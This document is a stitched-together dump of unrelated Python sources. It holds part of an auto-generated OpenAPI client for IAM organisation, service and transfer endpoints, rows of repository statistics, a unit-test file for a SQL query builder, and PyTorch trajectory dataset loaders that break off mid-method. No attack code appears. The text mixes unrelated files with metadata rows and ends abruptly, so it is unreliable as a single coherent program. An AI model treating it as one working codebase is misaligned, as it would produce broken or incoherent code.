'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_proforma_list = _Endpoint(
settings={
'response_type': ([Proforma],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/proforma',
'operation_id': 'iam_organisation_proforma_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_proforma_list
)
def __iam_organisation_service_get(
self,
organisation_id,
service_id,
**kwargs
):
"""Get iam/organisation.service # noqa: E501
Get iam/organisation.service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_service_get(organisation_id, service_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
service_id (str): serviceId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ResourceService
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['service_id'] = \
service_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_service_get = _Endpoint(
settings={
'response_type': (ResourceService,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/service/{serviceId}',
'operation_id': 'iam_organisation_service_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'service_id',
],
'required': [
'organisation_id',
'service_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'service_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'service_id': 'serviceId',
},
'location_map': {
'organisation_id': 'path',
'service_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_service_get
)
def __iam_organisation_service_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.service # noqa: E501
List iam/organisation.service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_service_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[ResourceService]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_service_list = _Endpoint(
settings={
'response_type': ([ResourceService],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/service',
'operation_id': 'iam_organisation_service_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_service_list
)
def __iam_organisation_transfer_accept(
self,
organisation_id,
transfer_id,
iam_organisation_transfer_accept,
**kwargs
):
"""Accept iam/organisation.transfer # noqa: E501
action accept # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_transfer_accept(organisation_id, transfer_id, iam_organisation_transfer_accept, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
transfer_id (str): transferId
iam_organisation_transfer_accept (IamOrganisationTransferAccept):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Transfer
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['transfer_id'] = \
transfer_id
kwargs['iam_organisation_transfer_accept'] = \
iam_organisation_transfer_accept
return self.call_with_http_info(**kwargs)
self.iam_organisation_transfer_accept = _Endpoint(
settings={
'response_type': (Transfer,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/transfer/{transferId}/actions/accept',
'operation_id': 'iam_organisation_transfer_accept',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'transfer_id',
'iam_organisation_transfer_accept',
],
'required': [
'organisation_id',
'transfer_id',
'iam_organisation_transfer_accept',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'transfer_id':
(str,),
'iam_organisation_transfer_accept':
(IamOrganisationTransferAccept,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'transfer_id': 'transferId',
},
'location_map': {
'organisation_id': 'path',
'transfer_id': 'path',
'iam_organisation_transfer_accept': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_transfer_accept
)
def __iam_organisation_transfer_get(
self,
organisation_id,
transfer_id,
**kwargs
):
"""Get iam/organisation.transfer # noqa: E501
Get iam/organisation.transfer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_transfer_get(organisation_id, transfer_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
transfer_id (str): transferId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Transfer
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['transfer_id'] = \
transfer_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_transfer_get = _Endpoint(
settings={
'response_type': (Transfer,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/transfer/{transferId}',
'operation_id': 'iam_organisation_transfer_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'transfer_id',
],
'required': [
'organisation_id',
'transfer_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'transfer_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'transfer_id': 'transferId',
},
'location_map': {
'organisation_id': 'path',
'transfer_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_transfer_get
)
def __iam_organisation_transfer_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.transfer # noqa: E501
List iam/organisation.transfer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_transfer_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Transfer]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_transfer_list = _Endpoint(
settings={
'response_type': ([Transfer],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/transfer',
'operation_id': 'iam_organisation_transfer_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_transfer_list
)
def __iam_organisation_update(
self,
organisation_id,
iam_organisation_update,
**kwargs
):
"""Update iam/organisation # noqa: E501
Returns modified organisation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_update(organisation_id, iam_organisation_update, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
iam_organisation_update (IamOrganisationUpdate):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Organisation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['iam_organisation_update'] = \
iam_organisation_update
return self.call_with_http_info(**kwargs)
self.iam_organisation_update = _Endpoint(
settings={
'response_type': (Organisation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}',
'operation_id': 'iam_organisation_update',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'iam_organisation_update',
],
'required': [
'organisation_id',
'iam_organisation_update',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'iam_organisation_update':
(IamOrganisationUpdate,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
'iam_organisation_update': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__iam_organisation_update
)
| 37.637131
| 147
| 0.468465
| 12,407
| 151,640
| 5.442331
| 0.018619
| 0.06614
| 0.023873
| 0.024792
| 0.934482
| 0.90267
| 0.877612
| 0.874843
| 0.859189
| 0.855664
| 0
| 0.0032
| 0.451754
| 151,640
| 4,028
| 148
| 37.646475
| 0.809
| 0.314614
| 0
| 0.686883
| 1
| 0
| 0.243716
| 0.059513
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011692
| false
| 0
| 0.008038
| 0
| 0.031421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0c96f9e72a2aca181cc738d01b7364b1ec62631c
| 7,863
|
py
|
Python
|
src/modu/test/test_sql.py
|
philchristensen/modu
|
795f3bc413956b98522ac514dafe35cbab0d57a3
|
[
"MIT"
] | null | null | null |
src/modu/test/test_sql.py
|
philchristensen/modu
|
795f3bc413956b98522ac514dafe35cbab0d57a3
|
[
"MIT"
] | null | null | null |
src/modu/test/test_sql.py
|
philchristensen/modu
|
795f3bc413956b98522ac514dafe35cbab0d57a3
|
[
"MIT"
] | null | null | null |
# modu
# Copyright (c) 2006-2010 Phil Christensen
# http://modu.bubblehouse.org
#
#
# See LICENSE for details
from twisted.trial import unittest
from modu.persist import sql
class SQLTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_interp_args_1(self):
query = sql.interp("SELECT * FROM some_table WHERE a = %s AND b = %s", 1, 'something')
expecting = "SELECT * FROM some_table WHERE a = %s AND b = %s" % (1, repr('something'))
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_interp_args_list(self):
query = sql.interp("SELECT * FROM some_table WHERE a IN %s AND b = %s", [1,2,3], 'something')
expecting = "SELECT * FROM some_table WHERE a IN (1,2,3) AND b = 'something'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_delete(self):
query = sql.build_delete('table', {'col1':'col1_data', 'col2':'col2_data'});
expecting = "DELETE FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_delete2(self):
query = sql.build_delete('table', col1='col1_data', col2='col2_data');
expecting = "DELETE FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_insert(self):
query = sql.build_insert('table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")});
expecting = "INSERT INTO `table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data')"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_insert2(self):
query = sql.build_insert('table', col2='col2_data', col1=sql.RAW("ENCRYPT('something')"));
expecting = "INSERT INTO `table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data')"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_multiple_insert(self):
query = sql.build_insert('table', [{'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")}, {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")}]);
expecting = "INSERT INTO `table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data'), (ENCRYPT('something'), 'col2_data')"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_insert_dot_syntax(self):
query = sql.build_insert('db.table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")});
expecting = "INSERT INTO db.`table` (`col1`, `col2`) VALUES (ENCRYPT('something'), 'col2_data')"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_insert_raw(self):
query = sql.build_insert('table', {'col2':'col2_data', 'col1':'col1_data'});
expecting = "INSERT INTO `table` (`col1`, `col2`) VALUES ('col1_data', 'col2_data')"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_replace(self):
query = sql.build_replace('table', {'col2':'col2_data', 'col1':'col1_data'});
expecting = "REPLACE INTO `table` SET `col1` = 'col1_data', `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_replace2(self):
query = sql.build_replace('table', col2='col2_data', col1='col1_data');
expecting = "REPLACE INTO `table` SET `col1` = 'col1_data', `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_replace_raw(self):
query = sql.build_replace('table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")});
expecting = "REPLACE INTO `table` SET `col1` = ENCRYPT('something'), `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_dot_syntax(self):
query = sql.build_select('db.table', {'t.col2':'col2_data', 's.col1':'col1_data'});
expecting = "SELECT * FROM db.`table` WHERE s.`col1` = 'col1_data' AND t.`col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select(self):
query = sql.build_select('table', {'col2':'col2_data', 'col1':'col1_data'});
expecting = "SELECT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select2(self):
query = sql.build_select('table', col2='col2_data', col1='col1_data');
expecting = "SELECT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_order(self):
query = sql.build_select('table', {'col1':'col1_data', 'col2':'col2_data', '__order_by':'id DESC'});
expecting = "SELECT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data' ORDER BY id DESC"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_distinct(self):
query = sql.build_select('table', {'col1':'col1_data', 'col2':'col2_data', '__select_keyword':'DISTINCT'});
expecting = "SELECT DISTINCT * FROM `table` WHERE `col1` = 'col1_data' AND `col2` = 'col2_data'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_in(self):
query = sql.build_select('table', {'col1':['col1_data', 'col2_data']});
expecting = "SELECT * FROM `table` WHERE `col1` IN ('col1_data', 'col2_data')"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_not_in(self):
query = sql.build_select('table', {'col1':sql.NOT(['col1_data', 'col2_data'])});
expecting = "SELECT * FROM `table` WHERE `col1` NOT IN ('col1_data', 'col2_data')"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_in_limit(self):
query = sql.build_select('table', {'col1':['col1_data', 'col2_data'], '__limit':5});
expecting = "SELECT * FROM `table` WHERE `col1` IN ('col1_data', 'col2_data') LIMIT 5"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_none(self):
query = sql.build_select('table', {'col1':None});
expecting = "SELECT * FROM `table` WHERE ISNULL(`col1`)"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_raw(self):
query = sql.build_select('table', {'col1':sql.RAW("%s = ENCRYPT('something', SUBSTRING(col1,1,2))")});
expecting = "SELECT * FROM `table` WHERE `col1` = ENCRYPT('something', SUBSTRING(col1,1,2))"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_not(self):
query = sql.build_select('table', {'col1':sql.NOT("somestring")});
expecting = "SELECT * FROM `table` WHERE `col1` <> 'somestring'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_gt(self):
query = sql.build_select('table', {'col1':sql.GT("somestring")});
expecting = "SELECT * FROM `table` WHERE `col1` > 'somestring'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
def test_build_select_lt(self):
query = sql.build_select('table', {'col1':sql.LT("somestring")});
expecting = "SELECT * FROM `table` WHERE `col1` < 'somestring'"
self.failUnlessEqual(query, expecting, 'Got "%s" when expecting "%s"' % (sql, expecting))
| 54.986014
| 162
| 0.679639
| 1,057
| 7,863
| 4.894986
| 0.083254
| 0.058755
| 0.060302
| 0.159451
| 0.915539
| 0.90143
| 0.860263
| 0.842675
| 0.806919
| 0.79223
| 0
| 0.024993
| 0.129849
| 7,863
| 142
| 163
| 55.373239
| 0.731219
| 0.012336
| 0
| 0.327103
| 0
| 0.102804
| 0.434077
| 0.016884
| 0
| 0
| 0
| 0
| 0
| 1
| 0.252336
| false
| 0.018692
| 0.018692
| 0
| 0.280374
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0cc733c7c93e0b891d4223fff0ef3243c59df05e
| 6,366
|
py
|
Python
|
notebooks/dataset_custom_z.py
|
prajwalresearch/rearrangement
|
7a430fe320dcea42f47569ff3126793e26e986d7
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/dataset_custom_z.py
|
prajwalresearch/rearrangement
|
7a430fe320dcea42f47569ff3126793e26e986d7
|
[
"BSD-3-Clause"
] | null | null | null |
notebooks/dataset_custom_z.py
|
prajwalresearch/rearrangement
|
7a430fe320dcea42f47569ff3126793e26e986d7
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import torch
import pandas as pd
from torch.utils.data.dataset import Dataset
import pickle
import pdb
# goal - (x1, y1)
# start - (x2, y2)
# cost_joint - 2.34
class TrajectoryDataset_customScipy(Dataset):
def __init__(self):
self.training_data= []
with open("dataScipy.pkl", 'rb') as f:
try:
while True:
data = pickle.load(f)
self.training_data.append(data)
except:
pass
f.close()
with open("dataScipy2.pkl", 'rb') as f:
try:
while True:
data = pickle.load(f)
self.training_data.append(data)
except:
pass
f.close()
self.itr =0
def __len__(self):
return len(self.training_data)
def __getitem__(self, index):
#pdb.set_trace()
start = np.array(
[self.training_data[index]['start_position'][0], self.training_data[index]['start_position'][1],
self.training_data[index]['start_position'][2]], dtype=np.float64)
goal = np.array(
[self.training_data[index]['goal_position'][0], self.training_data[index]['goal_position'][1],
self.training_data[index]['goal_position'][2]], dtype=np.float64)
net_input = np.concatenate((start, goal))
net_input = torch.from_numpy(net_input)
start = torch.from_numpy(start)
goal = torch.from_numpy(goal)
cost = self.training_data[index]['cost_j']
start_joint = torch.from_numpy(np.array(list(self.training_data[index]['trajectory'][:,0])))
end_joint = torch.from_numpy(np.array(list(self.training_data[index]['trajectory'][:,-1])))
#pdb.set_trace()
return start, goal, net_input, cost, start_joint, end_joint
class TrajectoryDataset_custom(Dataset):
def __init__(self, file_path):
with open(file_path, 'rb') as f:
self.training_data = pickle.load(f)
def __len__(self):
return len(self.training_data)
def __getitem__(self, index):
#pdb.set_trace()
start = np.array(
[self.training_data[index]['start_position'][0], self.training_data[index]['start_position'][1],
self.training_data[index]['start_position'][2]], dtype=np.float64)
goal = np.array(
[self.training_data[index]['goal_postiion'][0], self.training_data[index]['goal_postiion'][1],
self.training_data[index]['goal_postiion'][2]], dtype=np.float64)
net_input = np.concatenate((start, goal))
net_input = torch.from_numpy(net_input)
# start = torch.from_numpy(np.array([self.training_data[index][0][0], self.training_data[index][0][1]], dtype=np.float64))
# goal = torch.from_numpy(np.array([self.training_data[index][1][0], self.training_data[index][1][1]], dtype=np.float64))
cost = self.training_data[index]['cost_j']
start_joint = torch.from_numpy(np.array(list(self.training_data[index]['trajectory'][:,0])))
end_joint = torch.from_numpy(np.array(list(self.training_data[index]['trajectory'][:,:-1])))
return start, goal, net_input, cost, start_joint, end_joint
class TrajectoryDataset_custom_old_1(Dataset):
def __init__(self, file_path):
# self.training_file = pd.read_csv(file_path)
# self.start_x = self.training_file['start_x']
# self.start_y = self.training_file['start_y']
# self.start_theta1 = self.training_file['start_theta1']
# self.start_theta2 = self.training_file['start_theta2']
# self.goal_x = self.training_file['goal_x']
# self.goal_y = self.training_file['goal_y']
# self.goal_theta1 = self.training_file['goal_theta1']
# self.goal_theta2= self.training_file['goal_theta2']
with open(file_path, 'rb') as f:
self.training_data = pickle.load(f)
# def load_obj(name):
def __len__(self):
return len(self.training_data)
def __getitem__(self, index):
start = np.array([self.training_data[index][0][0], self.training_data[index][0][1]], dtype=np.float64)
goal = np.array([self.training_data[index][1][0], self.training_data[index][1][1]], dtype=np.float64)
net_input = np.concatenate((start, goal))
net_input = torch.from_numpy(net_input)
start = torch.from_numpy(
np.array([self.training_data[index][0][0], self.training_data[index][0][1]], dtype=np.float64))
goal = torch.from_numpy(
np.array([self.training_data[index][1][0], self.training_data[index][1][1]], dtype=np.float64))
cost = self.training_data[index][2]
# if cost is None:
# cost = np.array([1000000000], dtype = np.float64)
# pass
return start, goal, net_input, cost
class TrajectoryDataset_custom_old(Dataset):
def __init__(self, file_path):
self.training_file = pd.read_csv(file_path)
self.start_x = self.training_file['start_x']
self.start_y = self.training_file['start_y']
self.start_theta1 = self.training_file['start_theta1']
self.start_theta2 = self.training_file['start_theta2']
self.goal_x = self.training_file['goal_x']
self.goal_y = self.training_file['goal_y']
self.goal_theta1 = self.training_file['goal_theta1']
self.goal_theta2 = self.training_file['goal_theta2']
def __len__(self):
return len(self.start_x)
def __getitem__(self, index):
start = np.array([self.start_x[index], self.start_y[index]], dtype=np.float64)
goal = np.array([self.goal_x[index], self.goal_y[index]], dtype=np.float64)
